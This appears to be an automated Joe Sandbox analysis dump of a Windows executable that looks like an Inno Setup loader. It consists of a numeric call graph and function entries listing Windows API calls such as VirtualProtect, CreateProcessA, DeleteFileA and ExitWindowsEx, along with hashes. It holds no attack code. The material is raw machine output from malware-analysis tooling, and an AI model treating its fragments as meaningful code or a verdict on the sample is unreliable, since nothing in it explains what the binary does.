4075e7 GetLastError 6029->6031 6031->6030 6032 4075f0 6031->6032 6033 40748c 21 API calls 6032->6033 6033->6030 6407 405ac4 6408 405acc 6407->6408 6413 405ad4 6407->6413 6409 405adb 6408->6409 6410 405ad2 6408->6410 6411 405930 5 API calls 6409->6411 6414 405a3c 6410->6414 6411->6413 6421 405a44 6414->6421 6415 405a5e 6416 405a63 6415->6416 6417 405a7a 6415->6417 6419 405930 5 API calls 6416->6419 6420 403154 4 API calls 6417->6420 6418 403154 4 API calls 6418->6421 6422 405a76 6419->6422 6423 405a7f 6420->6423 6421->6415 6421->6418 6425 403154 4 API calls 6422->6425 6424 4059a0 19 API calls 6423->6424 6424->6422 6426 405aa8 6425->6426 6427 403154 4 API calls 6426->6427 6428 405ab6 6427->6428 6428->6413 6429 4076c8 WriteFile 6430 4076e8 6429->6430 6431 4076ef 6429->6431 6432 40748c 21 API calls 6430->6432 6433 407700 6431->6433 6434 4073ec 20 API calls 6431->6434 6432->6431 6434->6433 6435 40a2ca 6444 4096fc 6435->6444 6438 402f24 5 API calls 6439 40a2d4 6438->6439 6440 403198 4 API calls 6439->6440 6441 40a2f3 6440->6441 6442 403198 4 API calls 6441->6442 6443 40a2fb 6442->6443 6453 40569c 6444->6453 6446 409717 6448 409745 6446->6448 6459 40720c 6446->6459 6450 403198 4 API calls 6448->6450 6449 409735 6452 40973d MessageBoxA 6449->6452 6451 40975a 6450->6451 6451->6438 6452->6448 6454 403154 4 API calls 6453->6454 6455 4056a1 6454->6455 6456 4056b9 6455->6456 6457 403154 4 API calls 6455->6457 6456->6446 6458 4056af 6457->6458 6458->6446 6460 40569c 4 API calls 6459->6460 6461 40721b 6460->6461 6462 407221 6461->6462 6463 40722f 6461->6463 6464 40322c 4 API calls 6462->6464 6465 40723f 6463->6465 6467 40724b 6463->6467 6468 40722d 6464->6468 6470 4071d0 6465->6470 6477 4032b8 6467->6477 6468->6449 6471 40322c 4 API calls 6470->6471 6472 4071df 6471->6472 6473 4071fc 6472->6473 6474 406950 CharPrevA 6472->6474 6473->6468 6475 4071eb 6474->6475 6475->6473 6476 4032fc 4 API calls 6475->6476 6476->6473 6478 403278 4 API calls 6477->6478 6479 4032c2 6478->6479 6479->6468 6480 402ccc 6481 402cdd 6480->6481 6485 402cfe 6480->6485 6482 402d88 RtlUnwind 6481->6482 6484 402b28 RaiseException 6481->6484 6481->6485 6483 403154 4 API calls 6482->6483 6483->6485 6486 402d7f 6484->6486 6486->6482 6807 403fcd 6808 403f07 4 API calls 6807->6808 6809 403fd6 6808->6809 6810 403e9c 4 API calls 6809->6810 6811 403fe2 6810->6811 5465 4024d0 5466 4024e4 5465->5466 5467 4024f7 5465->5467 5504 401918 RtlInitializeCriticalSection 5466->5504 5469 402518 5467->5469 5470 40250e RtlEnterCriticalSection 5467->5470 5481 402300 5469->5481 5470->5469 5473 4024ed 5475 402525 5478 402581 5475->5478 5479 402577 RtlLeaveCriticalSection 5475->5479 5477 402531 5477->5475 5511 40215c 5477->5511 5479->5478 5482 402314 5481->5482 5483 4023b8 5482->5483 5484 402335 5482->5484 5485 402344 5483->5485 5489 402455 5483->5489 5528 401d80 5483->5528 5536 401e84 5483->5536 5484->5485 5525 401b74 5484->5525 5485->5475 5491 401fd4 5485->5491 5489->5485 5532 401d00 5489->5532 5492 401fe8 5491->5492 5493 401ffb 5491->5493 5494 401918 4 API calls 5492->5494 5495 402012 RtlEnterCriticalSection 5493->5495 5498 40201c 5493->5498 5496 401fed 5494->5496 5495->5498 5496->5493 5497 401ff1 5496->5497 5503 402052 5497->5503 5498->5503 5618 401ee0 5498->5618 5501 402147 5501->5477 5502 40213d RtlLeaveCriticalSection 5502->5501 5503->5477 5505 40193c RtlEnterCriticalSection 5504->5505 5506 401946 5504->5506 5505->5506 5507 401964 LocalAlloc 5506->5507 5508 40197e 5507->5508 5509 4019c3 RtlLeaveCriticalSection 5508->5509 5510 4019cd 5508->5510 5509->5510 5510->5467 5510->5473 5512 40217a 5511->5512 5513 402175 5511->5513 5514 4021ab RtlEnterCriticalSection 5512->5514 5517 4021b5 5512->5517 5521 40217e 5512->5521 5515 401918 4 API calls 5513->5515 5514->5517 5515->5512 5516 4021c1 5519 4022e3 RtlLeaveCriticalSection 5516->5519 5520 4022ed 5516->5520 5517->5516 5518 402244 5517->5518 5523 402270 5517->5523 5518->5521 5522 401d80 7 API calls 5518->5522 5519->5520 5520->5475 5521->5475 5522->5521 5523->5516 5524 401d00 7 API calls 5523->5524 5524->5516 5526 40215c 9 API calls 5525->5526 5527 401b95 5526->5527 5527->5485 5529 401d92 5528->5529 5530 401d89 5528->5530 5529->5483 5530->5529 5531 401b74 9 API calls 5530->5531 5531->5529 5533 401d1e 5532->5533 5534 401d4e 5532->5534 5533->5485 5534->5533 5541 401c68 5534->5541 5596 401768 5536->5596 5538 401e99 5539 401ea6 5538->5539 5607 401dcc 5538->5607 5539->5483 5542 401c7a 5541->5542 5543 401c9d 5542->5543 5544 401caf 5542->5544 5554 40188c 5543->5554 5545 40188c 3 API calls 5544->5545 5547 401cad 5545->5547 5548 401cc5 5547->5548 5564 401b44 5547->5564 5548->5533 5550 401cd4 5551 401cee 5550->5551 5569 401b98 5550->5569 5574 4013a0 5551->5574 5555 4018b2 5554->5555 5563 40190b 5554->5563 5578 401658 5555->5578 5560 4018e6 5562 4013a0 LocalAlloc 5560->5562 5560->5563 5562->5563 5563->5547 5565 401b61 5564->5565 5566 401b52 5564->5566 5565->5550 5567 401d00 9 API calls 5566->5567 5568 401b5f 5567->5568 5568->5550 5570 401bab 5569->5570 5571 401b9d 5569->5571 5570->5551 5572 401b74 9 API calls 5571->5572 5573 401baa 5572->5573 5573->5551 5575 4013ab 5574->5575 5576 4013c6 5575->5576 5577 4012e4 LocalAlloc 5575->5577 5576->5548 5577->5576 5580 40168f 5578->5580 5579 4016cf 5582 40132c 5579->5582 5580->5579 5581 4016a9 VirtualFree 5580->5581 5581->5580 5583 401348 5582->5583 5590 4012e4 5583->5590 5586 40150c 5588 40153b 5586->5588 5587 401594 5587->5560 5588->5587 5589 401568 VirtualFree 5588->5589 5589->5588 5593 40128c 5590->5593 5592 4012ef 5592->5560 5592->5586 5594 401298 LocalAlloc 5593->5594 5595 4012aa 5593->5595 5594->5595 5595->5592 5595->5595 5598 401787 5596->5598 5597 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5597->5598 5598->5597 5599 40183b 5598->5599 5601 40132c LocalAlloc 5598->5601 5602 401821 5598->5602 5603 4017d6 5598->5603 5604 4017e7 5599->5604 5614 4015c4 5599->5614 5601->5598 5605 40150c VirtualFree 5602->5605 5606 40150c VirtualFree 5603->5606 5604->5538 5605->5604 5606->5604 5608 401d80 9 API calls 5607->5608 5609 401de0 5608->5609 5610 40132c LocalAlloc 5609->5610 5611 401df0 5610->5611 5612 401b44 9 API calls 5611->5612 5613 401df8 5611->5613 5612->5613 5613->5539 5615 40160a 5614->5615 5616 401626 VirtualAlloc 5615->5616 5617 40163a 5615->5617 5616->5615 5616->5617 5617->5604 5622 401ef0 5618->5622 5619 401f1c 5620 401d00 9 API calls 5619->5620 5623 401f40 5619->5623 5620->5623 5622->5619 5622->5623 5624 401e58 5622->5624 5623->5501 5623->5502 5629 4016d8 5624->5629 5627 401dcc 9 API calls 5628 401e75 5627->5628 5628->5622 5632 4016f4 5629->5632 5631 4016fe 5633 4015c4 VirtualAlloc 5631->5633 5632->5631 5634 40175b 5632->5634 5635 40132c LocalAlloc 5632->5635 5637 40174f 5632->5637 5639 401430 5632->5639 5636 40170a 5633->5636 5634->5627 5634->5628 5635->5632 5636->5634 5638 40150c VirtualFree 5637->5638 5638->5634 5640 40143f VirtualAlloc 5639->5640 5642 40146c 5640->5642 5643 40148f 5640->5643 5644 4012e4 LocalAlloc 5642->5644 5643->5632 5645 401478 5644->5645 5645->5643 5646 40147c VirtualFree 5645->5646 5646->5643 6487 4028d2 6488 4028da 6487->6488 6489 403554 4 API calls 6488->6489 6490 4028ef 6488->6490 6489->6488 6491 4025ac 4 API calls 6490->6491 6492 4028f4 6491->6492 6812 4019d3 6813 4019ba 6812->6813 6814 4019c3 RtlLeaveCriticalSection 6813->6814 6815 4019cd 6813->6815 6814->6815 6034 407fd4 6035 407fe6 6034->6035 6037 407fed 6034->6037 6045 407f10 6035->6045 6038 408021 6037->6038 6040 408015 6037->6040 6041 408017 6037->6041 6039 40804e 6038->6039 6043 407d7c 19 API calls 6038->6043 6059 407e2c 6040->6059 6056 407d7c 6041->6056 6043->6039 6046 407f25 6045->6046 6047 407f34 6046->6047 6048 407d7c 19 API calls 6046->6048 6049 407f6e 6047->6049 6050 407d7c 19 API calls 6047->6050 6048->6047 6051 407f82 6049->6051 6052 407d7c 19 API calls 6049->6052 6050->6049 6055 407fae 6051->6055 6066 407eb8 6051->6066 6052->6051 6055->6037 6069 4058b4 6056->6069 6058 407d9e 6058->6038 6060 405184 19 API calls 6059->6060 6061 407e57 6060->6061 6077 407de4 6061->6077 6063 407e5f 6064 403198 4 API calls 6063->6064 6065 407e74 6064->6065 6065->6038 6067 407ec7 VirtualFree 6066->6067 6068 407ed9 VirtualAlloc 6066->6068 6067->6068 6068->6055 6070 4058c0 6069->6070 6071 405184 19 API calls 6070->6071 6072 4058ed 6071->6072 6073 4031e8 4 API calls 6072->6073 6074 4058f8 6073->6074 6075 403198 4 API calls 6074->6075 6076 40590d 6075->6076 6076->6058 6078 4058b4 19 API calls 6077->6078 6079 407e06 6078->6079 6079->6063 6497 40a0d5 6498 40a105 6497->6498 6499 40a10f CreateWindowExA SetWindowLongA 6498->6499 6500 405184 19 API calls 6499->6500 6501 40a192 6500->6501 6502 4032fc 4 API calls 6501->6502 6503 40a1a0 6502->6503 6504 4032fc 4 API calls 6503->6504 6505 40a1ad 6504->6505 6506 406b7c 5 API calls 6505->6506 6507 40a1b9 6506->6507 6508 4032fc 4 API calls 6507->6508 6509 40a1c2 6508->6509 6510 4099a4 29 API calls 6509->6510 6511 40a1d4 6510->6511 6512 409884 5 API calls 6511->6512 6513 40a1e7 6511->6513 6512->6513 6514 40a220 6513->6514 6515 4094d8 9 API calls 6513->6515 6516 40a239 6514->6516 6519 40a233 RemoveDirectoryA 6514->6519 6515->6514 6517 40a242 73A25CF0 6516->6517 6518 40a24d 6516->6518 6517->6518 6520 40a275 6518->6520 6521 40357c 4 API calls 6518->6521 6519->6516 6522 40a26b 6521->6522 6523 4025ac 4 API calls 6522->6523 6523->6520 6082 40a0e7 6083 40a0eb SetLastError 6082->6083 6114 409648 GetLastError 6083->6114 6086 40a105 6088 40a10f CreateWindowExA SetWindowLongA 6086->6088 6087 402f24 5 API calls 6087->6086 6089 405184 19 API calls 6088->6089 6090 40a192 6089->6090 6091 4032fc 4 API calls 6090->6091 6092 40a1a0 6091->6092 6093 4032fc 4 API calls 6092->6093 6094 40a1ad 6093->6094 6127 406b7c GetCommandLineA 6094->6127 6097 4032fc 4 API calls 6098 40a1c2 6097->6098 6132 4099a4 6098->6132 6101 409884 5 API calls 6102 40a1e7 6101->6102 6103 40a220 6102->6103 6104 40a207 6102->6104 6106 40a239 6103->6106 6109 40a233 RemoveDirectoryA 6103->6109 6148 4094d8 6104->6148 6107 40a242 73A25CF0 6106->6107 6108 40a24d 6106->6108 6107->6108 6110 40a275 6108->6110 6156 40357c 6108->6156 6109->6106 6112 40a26b 6113 4025ac 4 API calls 6112->6113 6113->6110 6115 404c84 19 API calls 6114->6115 6116 40968f 6115->6116 6117 407284 5 API calls 6116->6117 6118 40969f 6117->6118 6119 408da8 4 API calls 6118->6119 6120 4096b4 6119->6120 6121 405880 4 API calls 6120->6121 6122 4096c3 6121->6122 6123 4031b8 4 API calls 6122->6123 6124 4096e2 6123->6124 6125 403198 4 API calls 6124->6125 6126 4096ea 6125->6126 6126->6086 6126->6087 6128 406af0 4 API calls 6127->6128 6129 406ba1 6128->6129 6130 403198 4 API calls 6129->6130 6131 406bbf 6130->6131 6131->6097 6133 4033b4 4 API calls 6132->6133 6134 4099df 6133->6134 6135 409a11 CreateProcessA 6134->6135 6136 409a24 CloseHandle 6135->6136 6137 409a1d 6135->6137 6139 409a2d 6136->6139 6138 409648 21 API calls 6137->6138 6138->6136 6169 409978 6139->6169 6142 409a49 6143 409978 3 API calls 6142->6143 6144 409a4e GetExitCodeProcess CloseHandle 6143->6144 6145 409a6e 6144->6145 6146 403198 4 API calls 6145->6146 6147 409a76 6146->6147 6147->6101 6147->6102 6149 409532 6148->6149 6150 4094eb 6148->6150 6149->6103 6150->6149 6151 4094f3 Sleep 6150->6151 6152 409503 Sleep 6150->6152 6154 40951a GetLastError 6150->6154 6173 408fbc 6150->6173 6151->6150 6152->6150 6154->6149 6155 409524 GetLastError 6154->6155 6155->6149 6155->6150 6157 403591 6156->6157 6165 4035a0 6156->6165 6161 4035d0 6157->6161 6162 40359b 6157->6162 6164 4035b6 6157->6164 6158 4035b1 6163 403198 4 API calls 6158->6163 6159 4035b8 6160 4031b8 4 API calls 6159->6160 6160->6164 6161->6164 6167 40357c 4 API calls 6161->6167 6162->6165 6166 4035ec 6162->6166 6163->6164 6164->6112 6165->6158 6165->6159 6166->6164 6181 403554 6166->6181 6167->6161 6170 40998c PeekMessageA 6169->6170 6171 409980 TranslateMessage DispatchMessageA 6170->6171 6172 40999e MsgWaitForMultipleObjects 6170->6172 6171->6170 6172->6139 6172->6142 6174 408f70 2 API calls 6173->6174 6175 408fd2 6174->6175 6176 408fd6 6175->6176 6177 408ff2 DeleteFileA GetLastError 6175->6177 6176->6150 6178 409010 6177->6178 6179 408fac Wow64RevertWow64FsRedirection 6178->6179 6180 409018 6179->6180 6180->6150 6182 403566 6181->6182 6184 403578 6182->6184 6185 403604 6182->6185 6184->6166 6186 40357c 6185->6186 6187 4035a0 6186->6187 6191 4035d0 6186->6191 6192 40359b 6186->6192 6194 4035b6 6186->6194 6188 4035b1 6187->6188 6189 4035b8 6187->6189 6193 403198 4 API calls 6188->6193 6190 4031b8 4 API calls 6189->6190 6190->6194 6191->6194 6196 40357c 4 API calls 6191->6196 6192->6187 6195 4035ec 6192->6195 6193->6194 6194->6182 6195->6194 6197 403554 4 API calls 6195->6197 6196->6191 6197->6195 6819 402be9 RaiseException 6820 402c04 6819->6820 6530 402af2 6531 402afe 6530->6531 6534 402ed0 6531->6534 6535 403154 4 API calls 6534->6535 6537 402ee0 6535->6537 6536 402b03 6537->6536 6539 402b0c 6537->6539 6540 402b25 6539->6540 6541 402b15 RaiseException 6539->6541 6540->6536 6541->6540 6821 402dfa 6822 402e26 6821->6822 6823 402e0d 6821->6823 6825 402ba4 6823->6825 6826 402bc9 6825->6826 6827 402bad 6825->6827 6826->6822 6828 402bb5 RaiseException 6827->6828 6828->6826 6829 4075fa GetFileSize 6830 407626 6829->6830 6831 407616 GetLastError 6829->6831 6831->6830 6832 40761f 6831->6832 6833 40748c 21 API calls 6832->6833 6833->6830 6834 406ffb 6835 407008 SetErrorMode 6834->6835 6546 403a80 CloseHandle 6547 403a90 6546->6547 6548 403a91 GetLastError 6546->6548 6549 40a282 6550 40a1f4 6549->6550 6551 40a220 6550->6551 6552 4094d8 9 API calls 6550->6552 6553 40a239 6551->6553 6556 40a233 RemoveDirectoryA 6551->6556 6552->6551 6554 40a242 73A25CF0 6553->6554 6555 40a24d 6553->6555 6554->6555 6557 40a275 6555->6557 6558 40357c 4 API calls 6555->6558 6556->6553 6559 40a26b 6558->6559 6560 4025ac 4 API calls 6559->6560 6560->6557 6561 404283 6562 4042c3 6561->6562 6563 403154 4 API calls 6562->6563 6564 404323 6563->6564 6836 404185 6837 4041ff 6836->6837 6838 4041cc 6837->6838 6839 403154 4 API calls 6837->6839 6840 404323 6839->6840 6565 40a287 6566 40a290 6565->6566 6568 40a2bb 6565->6568 6575 409448 6566->6575 6570 403198 4 API calls 6568->6570 6569 40a295 6569->6568 6572 40a2b3 MessageBoxA 6569->6572 6571 40a2f3 6570->6571 6573 403198 4 API calls 6571->6573 6572->6568 6574 40a2fb 6573->6574 6576 409454 GetCurrentProcess OpenProcessToken 6575->6576 6577 4094af ExitWindowsEx 6575->6577 6578 409466 6576->6578 6579 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6576->6579 6577->6578 6578->6569 6579->6577 6579->6578 6580 403e87 6581 403e4c 6580->6581 6582 403e67 6581->6582 6583 403e62 6581->6583 6584 403e7b 6581->6584 6587 403e78 6582->6587 6593 402674 6582->6593 6589 403cc8 6583->6589 6586 402674 4 API calls 6584->6586 6586->6587 6590 403cd6 6589->6590 6591 402674 4 API calls 6590->6591 6592 403ceb 6590->6592 6591->6592 6592->6582 6594 403154 4 API calls 6593->6594 6595 40267a 6594->6595 6595->6587 6600 407e90 6601 407eb8 VirtualFree 6600->6601 6602 407e9d 6601->6602 6849 403991 6850 403983 6849->6850 6851 40374c VariantClear 6850->6851 6852 40398b 6851->6852 6853 405b92 6855 405b94 6853->6855 6854 405bd0 6858 405930 5 API calls 6854->6858 6855->6854 6856 405be7 6855->6856 6857 405bca 6855->6857 6862 404ccc 5 API calls 6856->6862 6857->6854 6859 405c3c 6857->6859 6860 405be3 6858->6860 6861 4059a0 19 API calls 6859->6861 6863 403198 4 API calls 6860->6863 6861->6860 6864 405c10 6862->6864 6865 405c76 6863->6865 6866 4059a0 19 API calls 6864->6866 6866->6860 6605 403e95 6606 403e4c 6605->6606 6607 403e62 6606->6607 6608 403e7b 6606->6608 6611 403e67 6606->6611 6609 403cc8 4 API calls 6607->6609 6610 402674 4 API calls 6608->6610 6609->6611 6612 403e78 6610->6612 6611->6612 6613 402674 4 API calls 6611->6613 6613->6612 6614 403a97 6615 403aac 6614->6615 6616 403bbc GetStdHandle 6615->6616 6617 403b0e CreateFileA 6615->6617 6627 403ab2 6615->6627 6618 403c17 GetLastError 6616->6618 6622 403bba 6616->6622 6617->6618 6619 403b2c 6617->6619 6618->6627 6621 403b3b GetFileSize 6619->6621 6619->6622 6621->6618 6623 403b4e SetFilePointer 6621->6623 6624 403be7 GetFileType 6622->6624 6622->6627 6623->6618 6628 403b6a ReadFile 6623->6628 6626 403c02 CloseHandle 6624->6626 6624->6627 6626->6627 6628->6618 6629 403b8c 6628->6629 6629->6622 6630 403b9f SetFilePointer 6629->6630 6630->6618 6631 403bb0 SetEndOfFile 6630->6631 6631->6618 6631->6622 6885 4011aa 6886 4011ac GetStdHandle 6885->6886 6224 4076ac SetEndOfFile 6225 4076c3 6224->6225 6226 4076bc 6224->6226 6227 40748c 21 API calls 6226->6227 6227->6225 6635 4028ac 6636 402594 4 API calls 6635->6636 6637 4028b6 6636->6637 6638 401ab9 6639 401a96 6638->6639 6640 401aa9 RtlDeleteCriticalSection 6639->6640 6641 401a9f RtlLeaveCriticalSection 6639->6641 6641->6640

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                                            • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2441996862-0
                                                                                                            • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                            • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                                            • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                            • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                            • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                                            • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                            • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                            • API String ID: 3256987805-3653653586
                                                                                                            • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                            • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                            • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                            • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02087C4C), ref: 0040966C
                                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                            • SetWindowLongA.USER32(0001043A,000000FC,00409918), ref: 0040A148
                                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                            • 73A25CF0.USER32(0001043A,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                            • API String ID: 3341979996-3001827809
                                                                                                            • Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                                            • Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
                                                                                                            • Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                                            • Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                            • API String ID: 1646373207-2130885113
                                                                                                            • Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                                            • Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
                                                                                                            • Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                                            • Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                            • SetWindowLongA.USER32(0001043A,000000FC,00409918), ref: 0040A148
                                                                                                              • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
